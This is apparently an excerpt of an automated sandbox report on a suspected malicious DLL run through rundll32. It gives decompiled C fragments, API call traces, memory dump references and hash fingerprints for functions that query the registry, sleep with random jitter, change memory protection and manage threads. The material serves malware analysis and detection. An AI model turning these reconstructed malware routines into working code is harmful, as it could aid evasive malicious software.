                                • Instruction Fuzzy Hash: E6518031A00208EBDB21EF99C5846AEFBB6EF4A311F19805BE815AF311D7709A41CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0343498E(signed int _a4, signed int* _a8) {
                                				void* __ecx;
                                				void* __edi;
                                				signed int _t6;
                                				intOrPtr _t8;
                                				intOrPtr _t12;
                                				long _t14;
                                				void* _t18;
                                				WCHAR* _t19;
                                				long _t20;
                                				void* _t25;
                                				signed int* _t28;
                                				CHAR* _t30;
                                				long _t31;
                                				WCHAR** _t32;
                                
                                				_t6 =  *0x343a310; // 0xd448b889
                                				_t32 = _a4;
                                				_a4 = _t6 ^ 0x109a6410;
                                				_t8 =  *0x343a348; // 0x21ad5a8
                                				_t3 = _t8 + 0x343b87a; // 0x61636f4c
                                				_t25 = 0;
                                				_t30 = E034311C3(_t3, 1);
                                				if(_t30 != 0) {
                                					_t25 = CreateEventA(0x343a34c, 1, 0, _t30);
                                					E03436C2C(_t30);
                                				}
                                				_t12 =  *0x343a2fc; // 0x4000000a
                                				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
                                					L12:
                                					_t28 = _a8;
                                					if(_t28 != 0) {
                                						 *_t28 =  *_t28 | 0x00000001;
                                					}
                                					_t14 = E0343402A(_t32, 0); // executed
                                					_t31 = _t14;
                                					if(_t31 == 0 && _t25 != 0) {
                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                					}
                                					if(_t28 != 0 && _t31 != 0) {
                                						 *_t28 =  *_t28 & 0xfffffffe;
                                					}
                                					goto L20;
                                				} else {
                                					_t18 = E034368BD(); // executed
                                					if(_t18 != 0) {
                                						goto L12;
                                					}
                                					_t19 = StrChrW( *_t32, 0x20);
                                					if(_t19 != 0) {
                                						 *_t19 = 0;
                                						_t19 =  &(_t19[1]);
                                					}
                                					_t20 = E03437928(0,  *_t32, _t19, 0); // executed
                                					_t31 = _t20;
                                					if(_t31 == 0) {
                                						if(_t25 == 0) {
                                							L22:
                                							return _t31;
                                						}
                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                						if(_t31 == 0) {
                                							L20:
                                							if(_t25 != 0) {
                                								FindCloseChangeNotification(_t25); // executed
                                							}
                                							goto L22;
                                						}
                                					}
                                					goto L12;
                                				}
                                			}

                                APIs
                                  • Part of subcall function 034311C3: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,055E9D70,00000000,?,?,69B25F44,00000005,0343A00C,4D283A53,?,?), ref: 034311F9
                                  • Part of subcall function 034311C3: lstrcpy.KERNEL32(00000000,00000000), ref: 0343121D
                                  • Part of subcall function 034311C3: lstrcat.KERNEL32(00000000,00000000), ref: 03431225
                                • CreateEventA.KERNEL32(0343A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,03437187,?,?,?), ref: 034349CF
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                • StrChrW.SHLWAPI(03437187,00000020,61636F4C,00000001,00000000,?,?,00000000,?,03437187,?,?,?), ref: 03434A02
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,03437187,00000000,00000000,?,00000000,?,03437187,?,?,?), ref: 03434A2F
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,03437187,?,?,?), ref: 03434A5D
                                • FindCloseChangeNotification.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,03437187,?,?,?), ref: 03434A75
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
• Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait$ChangeCloseCreateEventFindFreeHeapNotificationlstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 3294472205-0
                                • Opcode ID: 9bc462d022b32c24c5fb5c881694f78faedcc73353df90d03d6ad780d26a42dc
                                • Instruction ID: 6ab035a0c6c9baf0cbb7be6d7b638de0170c6bd4097654aa4b13e77c993d72c5
                                • Opcode Fuzzy Hash: 9bc462d022b32c24c5fb5c881694f78faedcc73353df90d03d6ad780d26a42dc
                                • Instruction Fuzzy Hash: 5021F5325003116BD731FAAA9885BEBB6E9EF4E710B19061BFD41EF345DB61C800868C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0348B7A4: RegCreateKeyA.ADVAPI32(80000001,0616B7F0,?), ref: 0348B7B9
                                  • Part of subcall function 0348B7A4: lstrlen.KERNEL32(0616B7F0,00000000,00000000,00000000,?,0348A2EB,00000001,?,00000000,00000000,00000000,?,0347109E,03499F2C,00000008,00000003), ref: 0348B7E2
                                • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F02
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03491F16
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F30
                                • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?,?,?), ref: 03491F4C
                                • RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,03472C89,?,?,?), ref: 03491F5A
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                                • String ID:
                                • API String ID: 1633053242-0
                                • Opcode ID: a17200d51312671563be1d2536eda41d52eb7f30304c10ed91ad5e1473ecb262
                                • Instruction ID: 403296dae2da9c4544a9ce6f8627c01fc197def5e37d891fe68603b9adb843da
                                • Opcode Fuzzy Hash: a17200d51312671563be1d2536eda41d52eb7f30304c10ed91ad5e1473ecb262
                                • Instruction Fuzzy Hash: D7118EB210014DBFEF01AF94CC84CAE7FBDFB88254B15046BF906AB210E7319D549B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleA.KERNEL32(?,?,?,?,?,0347111D,00000000), ref: 0348214D
                                • GetProcAddress.KERNEL32(00000000,?), ref: 03482166
                                • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,0347111D,00000000), ref: 03482183
                                • IsWow64Process.KERNEL32(?,?,?,?,?,?,0347111D,00000000), ref: 03482194
                                • FindCloseChangeNotification.KERNEL32(?,?,?,?,0347111D,00000000), ref: 034821A7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
                                • String ID:
                                • API String ID: 1712524627-0
                                • Opcode ID: 0e6b4288a9b1878a125b83fccc24f50eb1e4005bf4391bef87408d8bfece6961
                                • Instruction ID: 655c9f3beafa17b24e1eb678a653439aeeee8cb3208b6827db09aabaddbb0805
                                • Opcode Fuzzy Hash: 0e6b4288a9b1878a125b83fccc24f50eb1e4005bf4391bef87408d8bfece6961
                                • Instruction Fuzzy Hash: 95018071900604FFCB11FF55D84989EBBE8FB997917384667E905EF208E7708A41CB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 034733CA
                                • GetLastError.KERNEL32(?,00000000), ref: 034733D2
                                • VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 034733E9
                                • VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 0347340E
                                • SetLastError.KERNEL32(80000000,?,00000000), ref: 03473417
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$ErrorLastProtect$Query
                                • String ID:
                                • API String ID: 148356745-0
                                • Opcode ID: 656482e7a162b49b0de87769d0fadd0d1f2d7d6ea91461c5118616454c549683
                                • Instruction ID: 57e536402084620f5c7f12fbb7e658607de95edbac97b432f0125a2859518829
                                • Opcode Fuzzy Hash: 656482e7a162b49b0de87769d0fadd0d1f2d7d6ea91461c5118616454c549683
                                • Instruction Fuzzy Hash: 1E012576500219BFDF12AF95DC448EEBBBDEF19254B048027FA01EA224E771D914ABA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.NTDLL ref: 0348ED35
                                • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0348EDBF
                                • WaitForSingleObject.KERNEL32(00000064), ref: 0348EDCD
                                • SuspendThread.KERNEL32(?), ref: 0348EDE0
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                                • String ID:
                                • API String ID: 3168247402-0
                                • Opcode ID: 25b5d199696b414aa1ccb8ed6c46131a026f151c869f8db8336c25bb49e184f6
                                • Instruction ID: e7c3c1b0ed6cf4667781b5eaa16686e4e55f778f2164be3b2da79eb2c4c5e282
                                • Opcode Fuzzy Hash: 25b5d199696b414aa1ccb8ed6c46131a026f151c869f8db8336c25bb49e184f6
                                • Instruction Fuzzy Hash: 82416A71104301AFE721EF55C840A6FBBE9EF88714F14492EFA949A260D731D954CB66
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(80000002), ref: 0343755B
                                • SysAllocString.OLEAUT32(03433520), ref: 0343759F
                                • SysFreeString.OLEAUT32(00000000), ref: 034375B3
                                • SysFreeString.OLEAUT32(00000000), ref: 034375C1
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 9e97e59588429ba5223e68f6a130c70e4dba237638d5e80d6de7be5f435fa29e
                                • Instruction ID: 5c0c907d141c8b24137bb8208ae16d80ba7b83f06d01033a46ce8ad7fbbf9db6
                                • Opcode Fuzzy Hash: 9e97e59588429ba5223e68f6a130c70e4dba237638d5e80d6de7be5f435fa29e
                                • Instruction Fuzzy Hash: 50311DB6900249EFCB05DF98D8C09EEBBB9FF49340B24842EF946EB250D7709641CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 41%
                                			E034370D8(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                				intOrPtr _v12;
                                				void* _v16;
                                				void* _v28;
                                				char _v32;
                                				void* __esi;
                                				void* _t20;
                                				void* _t26;
                                				void* _t29;
                                				void* _t38;
                                				signed int* _t39;
                                				void* _t40;
                                
                                				_t36 = __ecx;
                                				_v32 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v12 = _a4;
                                				_t20 = E034354BB(__ecx,  &_v32); // executed
                                				_t38 = _t20;
                                				if(_t38 != 0) {
                                					L12:
                                					_t39 = _a8;
                                					L13:
                                					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                						_t23 =  &(_t39[1]);
                                						if(_t39[1] != 0) {
                                							E034378BF(_t23);
                                						}
                                					}
                                					return _t38;
                                				}
                                				_t26 = E03433695(0x40,  &_v16); // executed
                                				if(_t26 != 0) {
                                					_v16 = 0;
                                				}
                                				_t40 = CreateEventA(0x343a34c, 1, 0,  *0x343a3e4);
                                				if(_t40 != 0) {
                                					SetEvent(_t40);
                                					Sleep(0xbb8); // executed
                                					FindCloseChangeNotification(_t40); // executed
                                				}
                                				_push( &_v32);
                                				if(_a12 == 0) {
                                					_t29 = E034371B6(_t36); // executed
                                				} else {
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_t29 = E03433472(_t36);
                                				}
                                				_t41 = _v16;
                                				_t38 = _t29;
                                				if(_v16 != 0) {
                                					E03433AC2(_t41);
                                				}
                                				if(_t38 != 0) {
                                					goto L12;
                                				} else {
                                					_t39 = _a8;
                                					_t38 = E0343498E( &_v32, _t39);
                                					goto L13;
                                				}
                                			}
                                0x034370d8
                                0x034370e5
                                0x034370eb
                                0x034370ec
                                0x034370ed
                                0x034370ee
                                0x034370ef
                                0x034370f3
                                0x034370fa
                                0x034370ff
                                0x03437103
                                0x0343718b
                                0x0343718b
                                0x0343718e
                                0x03437190
                                0x03437198
                                0x0343719e
                                0x034371a1
                                0x034371a1
                                0x0343719e
                                0x034371ac
                                0x034371ac
                                0x0343710f
                                0x03437116
                                0x03437118
                                0x03437118
                                0x0343712f
                                0x03437133
                                0x03437136
                                0x03437141
                                0x03437148
                                0x03437148
                                0x03437151
                                0x03437155
                                0x03437163
                                0x03437157
                                0x03437157
                                0x03437158
                                0x03437159
                                0x0343715a
                                0x0343715b
                                0x0343715c
                                0x0343715c
                                0x03437168
                                0x0343716b
                                0x0343716f
                                0x03437171
                                0x03437171
                                0x03437178
                                0x00000000
                                0x0343717a
                                0x0343717a
                                0x03437187
                                0x00000000
                                0x03437187

                                APIs
                                • CreateEventA.KERNEL32(0343A34C,00000001,00000000,00000040,?,?,76CDF710,00000000,76CDF730), ref: 03437129
                                • SetEvent.KERNEL32(00000000), ref: 03437136
                                • Sleep.KERNEL32(00000BB8), ref: 03437141
                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 03437148
                                  • Part of subcall function 034371B6: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,03437168,?), ref: 034371DC
                                  • Part of subcall function 034371B6: RegEnumKeyExA.KERNEL32(?,?,?,03437168,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,03437168), ref: 03437223
                                  • Part of subcall function 034371B6: WaitForSingleObject.KERNEL32(00000000,?,?,?,03437168,?,03437168,?,?,?,?,?,03437168,?), ref: 03437290
                                  • Part of subcall function 034371B6: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,03437168,?), ref: 034372B8
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: CloseEvent$ChangeCreateEnumFindNotificationObjectOpenSingleSleepWait
                                • String ID:
                                • API String ID: 780868161-0
                                • Opcode ID: 5b1c96a3a946043bcd773a348d8924ad8364e5eef3b3de9cf65c1d432b5746ca
                                • Instruction ID: 2bac945ec7afe220332996227a263570dc04aed302c92ab1a466606c5c7f7670
                                • Opcode Fuzzy Hash: 5b1c96a3a946043bcd773a348d8924ad8364e5eef3b3de9cf65c1d432b5746ca
                                • Instruction Fuzzy Hash: 482165B7900215AFDF20FFA588849DFBBB99B4E250B044426EA91AF300D77499458B95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E034312CA(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
                                				long _t26;
                                				intOrPtr* _t38;
                                				char* _t42;
                                				long _t43;
                                
                                				if(_a4 == 0) {
                                					L2:
                                					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
                                					_t43 = _t26;
                                					if(_t43 == 0) {
                                						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
                                						if(_a4 == 0) {
                                							_t43 = 0xe8;
                                						} else {
                                							_t42 = E03436D63(_a4);
                                							if(_t42 == 0) {
                                								_t43 = 8;
                                							} else {
                                								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
                                								if(_t43 != 0) {
                                									E03436C2C(_t42);
                                								} else {
                                									 *_a20 = _t42;
                                									_t38 = _a24;
                                									if(_t38 != 0) {
                                										 *_t38 = _a4;
                                									}
                                								}
                                							}
                                						}
                                						RegCloseKey(_a12); // executed
                                					}
                                					L12:
                                					return _t43;
                                				}
                                				_t43 = E03436500(_a4, _a8, _a12, _a16, _a20, _a24);
                                				if(_t43 == 0) {
                                					goto L12;
                                				}
                                				goto L2;
                                			}
                                0x034312d6
                                0x034312f9
                                0x03431303
                                0x03431309
                                0x0343130d
                                0x03431325
                                0x0343132a
                                0x03431372
                                0x0343132c
                                0x03431334
                                0x03431338
                                0x0343136f
                                0x0343133a
                                0x0343134c
                                0x03431350
                                0x03431366
                                0x03431352
                                0x03431355
                                0x03431357
                                0x0343135c
                                0x03431361
                                0x03431361
                                0x0343135c
                                0x03431350
                                0x03431338
                                0x0343137a
                                0x0343137a
                                0x03431381
                                0x03431387
                                0x03431387
                                0x034312ef
                                0x034312f3
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • RegOpenKeyW.ADVAPI32(80000002,055E9E92,055E9E92), ref: 03431303
                                • RegQueryValueExW.KERNEL32(055E9E92,?,00000000,80000002,00000000,00000000,?,03433551,3D034390,80000002,03437168,00000000,03437168,?,055E9E92,80000002), ref: 03431325
                                • RegQueryValueExW.ADVAPI32(055E9E92,?,00000000,80000002,00000000,00000000,00000000,?,03433551,3D034390,80000002,03437168,00000000,03437168,?,055E9E92), ref: 0343134A
                                • RegCloseKey.KERNEL32(055E9E92,?,03433551,3D034390,80000002,03437168,00000000,03437168,?,055E9E92,80000002,00000000,?), ref: 0343137A
                                  • Part of subcall function 03436500: SafeArrayDestroy.OLEAUT32(00000000), ref: 03436588
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                                • String ID:
                                • API String ID: 486277218-0
                                • Opcode ID: 8660de9f8772830ba8f02a02f167e35e938433a9c577a04ddda442354a00bb54
                                • Instruction ID: 6783e324d385e9a13a95a90f674892b15456a116e47ea690cf9e20925c840adb
                                • Opcode Fuzzy Hash: 8660de9f8772830ba8f02a02f167e35e938433a9c577a04ddda442354a00bb54
                                • Instruction Fuzzy Hash: 1B212A7240011EBFEF11EE94DC848EE7BA9FB0A290B058426FE159F620D632DD609B95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,034762DD,?,?,?,?), ref: 03489686
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0348969D
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,034762DD,?,?,?,?,?,?,00000000), ref: 034896B8
                                • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,034762DD,?,?,?,?), ref: 034896D7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapQueryValue$AllocateFree
                                • String ID:
                                • API String ID: 4267586637-0
                                • Opcode ID: d079b5be10664744a30a235ecd411a9774b1dd316eda95fec68fd70e1e8d925e
                                • Instruction ID: 0537bf4a1e5b2c38ea76525db5e1f0833707fcf1c2491fdd913c3810d53a10ec
                                • Opcode Fuzzy Hash: d079b5be10664744a30a235ecd411a9774b1dd316eda95fec68fd70e1e8d925e
                                • Instruction Fuzzy Hash: FC113AB6900518FFDB12EF95DC84CEEBBBDEB89350B104056F901AA220E3715E40DB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 65%
                                			E03434B89(void* __ecx, intOrPtr _a4) {
                                				struct _FILETIME _v12;
                                				int _t13;
                                				signed int _t16;
                                				void* _t18;
                                				signed int _t19;
                                				unsigned int _t23;
                                				void* _t30;
                                				signed int _t34;
                                
                                				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                                				asm("stosd");
                                				do {
                                					_t13 = SwitchToThread();
                                					GetSystemTimeAsFileTime( &_v12);
                                					_t23 = _v12.dwHighDateTime;
                                					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                                					_push(0);
                                					_push(0x13);
                                					_push(_t23 >> 5);
                                					_push(_t16);
                                					L034383A6();
                                					_t34 = _t16 + _t13;
                                					_t18 = E03435D2E(_a4, _t34);
                                					_t30 = _t18;
                                					_t19 = 3;
                                					Sleep(_t19 << (_t34 & 0x00000007)); // executed
                                				} while (_t30 == 1);
                                				return _t30;
                                			}
                                0x03434b8e
                                0x03434b99
                                0x03434b9a
                                0x03434b9a
                                0x03434ba6
                                0x03434baf
                                0x03434bb2
                                0x03434bb6
                                0x03434bb8
                                0x03434bbd
                                0x03434bbe
                                0x03434bbf
                                0x03434bc9
                                0x03434bcc
                                0x03434bd3
                                0x03434bd7
                                0x03434bde
                                0x03434be4
                                0x03434bee

                                APIs
                                • SwitchToThread.KERNEL32(?,00000001,?,?,?,03431D14,?,?), ref: 03434B9A
                                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,03431D14,?,?), ref: 03434BA6
                                • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 03434BBF
                                  • Part of subcall function 03435D2E: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 03435D8D
                                • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,03431D14,?,?), ref: 03434BDE
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                                • String ID:
                                • API String ID: 1610602887-0
                                • Opcode ID: 82f6ea27b5e0097abbc7cab2de0b65eeaaaaa8816e1afc53e9737a37c3549f04
                                • Instruction ID: 012b3e19e01eb34fe48e745c66afb7b14850908fc952d221e4e93ac09a05e758
                                • Opcode Fuzzy Hash: 82f6ea27b5e0097abbc7cab2de0b65eeaaaaa8816e1afc53e9737a37c3549f04
                                • Instruction Fuzzy Hash: B1F0A477A402087BD7149BA5DC5DFDF77F9DB89351F040125F601EB340E6B49A008654
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0349A170,00000000,03485D81,?,0347F2F7,?), ref: 034771D3
                                • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0349A170,00000000,03485D81,?,0347F2F7,?), ref: 034771DE
                                • _wcsupr.NTDLL ref: 034771EB
                                • lstrlenW.KERNEL32(00000000), ref: 034771F3
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                                • String ID:
                                • API String ID: 2533608484-0
                                • Opcode ID: f43664807143c568affeedd8b85eac533d1001a9fe22157be72ba3b5c71451df
                                • Instruction ID: 37f0bae655df3b07072776a5b43a80fef7a78f5488093e0c66a98f1f8119a5aa
                                • Opcode Fuzzy Hash: f43664807143c568affeedd8b85eac533d1001a9fe22157be72ba3b5c71451df
                                • Instruction Fuzzy Hash: 7BF0B4362012102E9312FBB65C8CABF5A9DBB926A4724082FF514EE144DF64CC0285A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0348C3A3
                                  • Part of subcall function 03478FAE: RtlEnterCriticalSection.NTDLL(00000000), ref: 03478FBA
                                  • Part of subcall function 03478FAE: CloseHandle.KERNEL32(?), ref: 03478FC8
                                  • Part of subcall function 03478FAE: RtlLeaveCriticalSection.NTDLL(00000000), ref: 03478FE4
                                • CloseHandle.KERNEL32(?), ref: 0348C3B1
                                • InterlockedDecrement.KERNEL32(0349A05C), ref: 0348C3C0
                                  • Part of subcall function 0348E831: SetEvent.KERNEL32(000005BC,0348C3DB), ref: 0348E83B
                                  • Part of subcall function 0348E831: CloseHandle.KERNEL32(000005BC), ref: 0348E850
                                  • Part of subcall function 0348E831: HeapDestroy.KERNELBASE(05D70000), ref: 0348E860
                                • RtlExitUserThread.NTDLL(00000000), ref: 0348C3DC
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                                • String ID:
                                • API String ID: 1141245775-0
                                • Opcode ID: 953425f7b50f3729034430aae37430a70925cee91b843676c0638c807a0b15de
                                • Instruction ID: 779c7508fe3bc4fd881a62119d7a385ef354c1f39a08f6d61df6075df67460f2
                                • Opcode Fuzzy Hash: 953425f7b50f3729034430aae37430a70925cee91b843676c0638c807a0b15de
                                • Instruction Fuzzy Hash: 4AF04430540204AFDB02AB698C8AE5E7B68FB43730B61035BF525AF2C4DB745D0287A8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 50%
                                			E0343765B(void** __esi) {
                                				intOrPtr _v0;
                                				intOrPtr _t4;
                                				intOrPtr _t6;
                                				void* _t8;
                                				void* _t9;
                                				intOrPtr _t10;
                                				void* _t11;
                                				void** _t13;
                                
                                				_t13 = __esi;
                                				_t4 =  *0x343a3cc; // 0x55e95b0
                                				__imp__(_t4 + 0x40);
                                				while(1) {
                                					_t6 =  *0x343a3cc; // 0x55e95b0
                                					_t1 = _t6 + 0x58; // 0x0
                                					if( *_t1 == 0) {
                                						break;
                                					}
                                					Sleep(0xa);
                                				}
                                				_t8 =  *_t13;
                                				if(_t8 != 0 && _t8 != 0x343a030) {
                                					HeapFree( *0x343a2d8, 0, _t8);
                                				}
                                				_t9 = E03436E6D(_v0, _t13); // executed
                                				_t13[1] = _t9;
                                				_t10 =  *0x343a3cc; // 0x55e95b0
                                				_t11 = _t10 + 0x40;
                                				__imp__(_t11);
                                				return _t11;
                                			}
                                0x0343765b
                                0x0343765b
                                0x03437664
                                0x03437674
